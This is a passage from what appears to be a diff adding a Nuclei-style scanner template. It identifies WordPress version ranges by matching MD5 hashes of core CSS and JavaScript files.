dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"4106f98f5e50d92365ae8de1bb31b17e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"eedd69d39fbf83d70c4a58388d86b78e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1adb87b01b6c9adc1d7c8945f5cd06cd\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"a3c0334eac78e5a18d33185363c6bc50\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"dce16834bbccd5cd685549a17fb33f54\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4cea98cb05da1da6b9f302f8f34fd16b\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d3948c5ae3ff777bee390743048c01ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"63b9fc0fc0d229a570d73b78f182f030\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"d2b699f14ca35864ecdd61c8eec9604d\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3ad10e15b536d246988e4107372192ad\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"135aac1749fb85f75120b1391ace9b2c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ece593e9a38bcf8e294ccb0e5618cb92\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"155dad24f705111873d99ba61cf7ac98\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"494254d427a06ead698729501d1706c9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"057d4b0dc0761731460c3a78711242cf\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7f6bf805e4601032047107ba844e06a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"af04e0352749d2834d0f8ff8bbcd1727\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c48f03938beb59b2bc71921974abd386\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"eed95b401c0cbd317ef19bfda30dd91f\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3ce438c585dd0ae1a261fafbf8d88629\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"c2f2191e1ed405bd0ba32bf2cc6f7bad\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1447ed1679f787adc186df8eac30ce1e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ec0296e848d93d9d119ae07bc0085a3b\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"76ca02b48506b7c718e88c0b1d1cee08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4633889cc5ae0bd0607d589c1eacae8c\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2982623d3fb11fcd05f8eb36b84cb557\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"19df2fb667479f623db601ed0ac2f185\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - 
"(\"434192ef92ee1de6c2d24ffa1b5eee29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/src/Core/Curve25519/README.md" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/src/Core32/Curve25519/README.md" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-sanitize.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.2 + dsl: + - "(\"60b4efeac56fd08f7ba4f0f48e915dae\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"3e03f2d302e5c48328d7bbf14a518f5e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"345ce3beb91fab17ded64b7914e47a98\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5e8febbd8db3d3de4c68ec632b6883fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.min.js" + matchers: + - type: dsl + name: 3.7.34 - 5.2.9 + dsl: + - "(\"bc4487194e1f88126b8a500ad47e6889\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"a1c18227e6e93798c493aed96ee6cc84\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"fb8bf6785e55e9e39bea552635c42a64\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a3b3fabcf845edad4a169343add9b94b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"18da1537e85888cf774f9c1985710c61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"35d899a81986173f44f9bbe686cc583c\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"c9858d42fa9f0d03f5e62ffda9c4b491\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.3.25 + dsl: + - 
"(\"34a938334208cacfd97631b04283ddd9\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"ef4188cb0b60a72017f4c8a1e840ab1e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c5fe2b8725d6986faa885f6dcc1771dc\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"733e4f25a6dd1b1bd1094e711666aeda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-custom-header.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"802bee0e5f600483e0247f59b3b329b4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"95b069cef80307604eb843676b41da51\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5906907f0e17e15c5048fa1755739ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"e186209dc41a59f2fb627c24e640712d\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.5.23 + dsl: + - "(\"58ab2fba61b092b0f4efe8aaa3b2864e\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"350af5af9077a62d67bae1f33a4f48fc\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"2d4c4e47b6dcb0ae0352459b3d7641c3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"3086288f91098c51c719dc0e5874492c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"71131b3bc63bacef4c40b16235c5e735\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"b31d1b558c94797b5bc14d2ce6374178\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-backbone.min.js" + matchers: + - type: dsl + name: 4.5 - 5.2.9 + dsl: + - "(\"b978d3c20a25ca1d36c1688c298c8239\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"b569e29ff8fd482e0ee75e1494085621\" == 
md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"355454f73b6cb8b46bac2dfbd1991b0a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"aade6cd57d7e3565cbaa089fd3b0efe1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"643ca3336f29d3cab7ce9dd7da8bc2a6\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a38ce053c5664bc2449c10f98d2d2917\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wpdialog.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"d22d9fa5bb00ba0667080da846c4a1be\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f115cf2572a2a18ae56ec045f61abafe\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3d6e52f38f2de2ef4b50e3cd3d8cb53c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"ca500ade854c31417faf5762e31b9d00\" == md5(body))" + - type: dsl + name: 3.7 - 4.1.32 + dsl: + - "(\"6f0074f1f2d119430222bc3c0950ac2f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c437e5d75778eae76b508b0a636f555c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fcaf34b14eacc973d37e9ab8c6ad6c65\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ab33227e56c7fcc9e1c626e910106cef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/zxcvbn-async.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"3196e9b61f703909e139ce7e049a7ffd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bf8ad109c3719269fdec077456a255e0\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1ea3d35fc9ace7cd413a744524bf26c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - 
"(\"d252f431d400b696e25ca9fec9a1113e\" == md5(body))" + - type: dsl + name: 3.7 - 4.5.23 + dsl: + - "(\"b4031fcf4f4279be864d4bd82f7fc46c\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6bca22d5b17b85037767147333536b25\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"50907a74cc5046688748ec7910a806ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-util.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"83118aa939b5832dd4e1cad8b186012c\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"d099d4d6b145900b334fc3215ff55791\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.2.29 + dsl: + - "(\"39ca66318ef66201510aebcaad263210\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"f96c33819e26e9187e5d23bf2de399bc\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ed55a3ebb6ae3bb03f049538496a15b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d7d084f508f3d6965efc4be3bcfa255e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"12b99b14f0a718568e3e516f36bdb886\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"7df18b42cbd5cbaa5067c06f57aa876b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2a89454a1a6e55235a35d2fdb7e21288\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a255f1d03060ae5e5f8d6f1b6238c7b7\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"8802453513507186e7cff5316d83bc1e\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"98747c729c8e35d2d6781cc587d9d291\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"fe4f0bb44f6aa5584e2969665f2e6aa6\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"c7b59d9b7e2339b76708ccff21cfe930\" 
== md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"df360a33e64d91258ff738d8ae445397\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8193a9bc8e1d51b1945eaba9616971fe\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"359c22a08c86586f34c59a1f05bee149\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"997f505fc9d24a27e4939641450e96a4\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"c71cccaeb645b4e75e963aecff2f5fc6\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5ecafe9ee88afb02ea468552f41c608d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3bd992110e70a32eceff0c0243f33171\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2de2fdb4605ef9fd1db104da6e1ef5ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"f9ff4694933001933bdec2c133b2252d\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"58be56b4289c7fad06598d3d4d8ce1f8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3c2b5fe432b3e74d2f0317612b6ad589\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a8cbfa799d19910979e8703ed7498c5b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/language-chooser.min.js" + matchers: + - type: dsl + name: 4.0 - 5.2.9 + dsl: + - "(\"1d6822384a71090c74add106e4468581\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1e20e39aa9b8414f11608d62414ddd1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"376515a45db7b25e4a11f05bed321958\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 5.2.9 + dsl: + - "(\"ca37de8a34e673469901c4113e99d693\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cf2e2e5b78863f6c5bd85bbf4594dbc2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"30a021c3001e66ca247dfeff5695d387\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/accordion.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"226bc149fc7a1d2d56e4530d3b685e58\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"e97f90fda0240174382921696f5a7ebe\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cfa0d94d00f7a8a147c3815dc819e114\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"7e21d082e2c0386ef6fe6571e7880e20\" == md5(body))" + - type: dsl + name: 3.7 - 3.9.33 + dsl: + - "(\"eb1fdf4f1d54234db56aaf3b979bb37f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ac7c461283eed11c59afbaf9557e6520\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"67459976d4b544d88025aacbcc5d922c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"65b4fed487bb9839510393b2a5c573d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/svg-painter.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"a79aca561a5b87b62a710b0526a8e4bd\" == md5(body))" + - type: dsl + name: 3.8.34 - 4.5.23 + dsl: + - "(\"8af3a4fbdca543699984d98cf95d1b03\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"8db7f2acb2c205b766167517ccce7f8a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"d149da3de567730515abb2a9a2570e8a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"000daef8be797700bf57756a191f0097\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c71153a1a202375d132936a337709e26\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/user-suggest.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"e089545cd7fcde5c7cd70de3a70139e1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6ab5530d88daf1b8a2a1cf629868dcc9\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"77f81ca93899eaae1f67dbb695ead0e3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"87209d46b9230db274cb2a463505b902\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d19dcca2d1e1ecc4564e339ada19f6c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7f5a63461a4870dcff29bcf63b6c9910\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"8e7a4405d35139f62871a539516679a1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"bbc4f3add6171c484f437bb1ffdc916d\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"5d06470c0ac27ec77a1a6352f0558e35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b67f971fa55ec7f55b25c0af6f459a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"55297aab43dc737301324eac9dfed60d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"5b40ade72a4e6add4ec2147a58859a4b\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3451b304328c37c168f92f2dab48fcee\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b9b99fe065ec4736507c69be831a275c\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"05c7517e06bb14b5eaa336c261b99b81\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1193b5a24ea9327bbf3661c68b64cf80\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - 
"(\"a5f3b545a796e07e300f08d3c1e5386b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7c7901cd82ff1df1dbc556fe17d42024\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"a8a1e6df35c41ccb093b228d72cfd050\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7906c28d01cc9fd1425457fcd672d1f0\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"b02a9bf568ddbf039eb477f8db40783c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5cdd681b80ed5519adb2c9607f04d23c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0806273a8f28ca374831208bc1444375\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0ab80e738428314137a73a82460a87ae\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"b86c749b784acc5a8481b0888619234c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"186734538503669929e8d152100c2696\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d4a7e5ea513e162317f02081d00d2f4d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/code-editor.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3a55d10a30b356e96dd77cd870171558\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cc5081a21ab16c3e074aea785487432b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7e211c9b4b06d1d41fc28d88b3968d90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3fbbc0b9f61ddca152fa3847aba20581\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8a1e7473d3a063c4e783d0bc44ec83d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - 
"(\"d60c2db4e35e359b8a2816c93e768ea1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.min.js" + matchers: + - type: dsl + name: 3.8 - 4.9.5 + dsl: + - "(\"66b227ca28f41f2e0615b04a390d5e04\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5467d9418e2842e476e453fd741fdbc5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2.9 + dsl: + - "(\"1b6f6842124166a08328aa7ad376027e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8ec7c5389884c02249560b08ba149bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"294d8e8a6989bfc618c1f6ad7d3554e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed.min.js" + matchers: + - type: dsl + name: 4.7 - 4.9.8 + dsl: + - "(\"5a03f97cc479b9f5d7efdaccec31bc17\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"687bf3104f17a2e9afced6d17acb384f\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.23 + dsl: + - "(\"0203f8b4d98102d02f6a569c40a47d7b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"2fb8dee3969a7597d0d892028e01cc2e\" == md5(body))" + - type: dsl + name: 4.9.9 - 5.2.9 + dsl: + - "(\"2dce40d16f9ff6332d3cbb7ae488a2b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"04133d37cfd0f08267530b905a5ffff3\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8ed6038a5dbf62380de72a681340afd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/underscore.min.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"6a3a434a1360cc744341e97de9177bc6\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"929daff1019e5493c0486bfb7a642e2e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"252137d39d087bba598caf8cf94d2aec\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4f76be3bf897efbc3c44acbcbe1f4947\" == md5(body))" + - 
type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a8167cbe4acedc5f0132f7b087c24bd0\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"0bd7146b45c933ad9bfe210a41cd79b1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"dc95efbaca369dccfda71412431de555\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"039ca2cb0b64e4962638e527bb56e8d0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/utils.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"f6e3d57217de41fa3243331155452bb1\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"f4c1bfc14e78c5ccdcbdff37cd463733\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"41fa39bcefcede21b93beb099cfa78d7\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"06f830e4be5cac10b951ee7e59e43e39\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8b1224eaeca8bc3cddd4b9bcaab54802\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b281e77e23b0bc3cc9c19cb36e7e6286\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c6fe48bca8ff16583cacfe347d4a6fd8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"db523749051a987a9bf69e1dcc68c85a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/backbone.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"9263ddbe52f85e7be13301ac26889c8e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"198da1987a056bee56437d5bc3c9c176\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"88fee57a12be8ea719ed85fe29f062d3\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6d6bc60cd42263c2ffd0b4b6523400c5\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"09622714468a28bca3cac046ee92d8f6\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - 
"(\"9f8b43fd1df78dca0827c73e29890865\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"710b5fe97d75f4305cd8dd472aae4132\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2781e10bd1b33dacb15e164e8a1e872e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"dcbe63759afdeb816d8ddc8a659d2764\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"f320174ed63de275264dcf5430c309dc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e92fc3fab3c608da250c11fe97d96680\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"61ea709a3314ba200a885e2465267aa2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1131334fb18ce021bf24a79cf8030eeb\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6f56f6255bf7f1a228c15903bb652202\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"159be51feb8551297e0831216561c064\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"878d3eefdc8ff87d256f1231fd6e8d22\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + 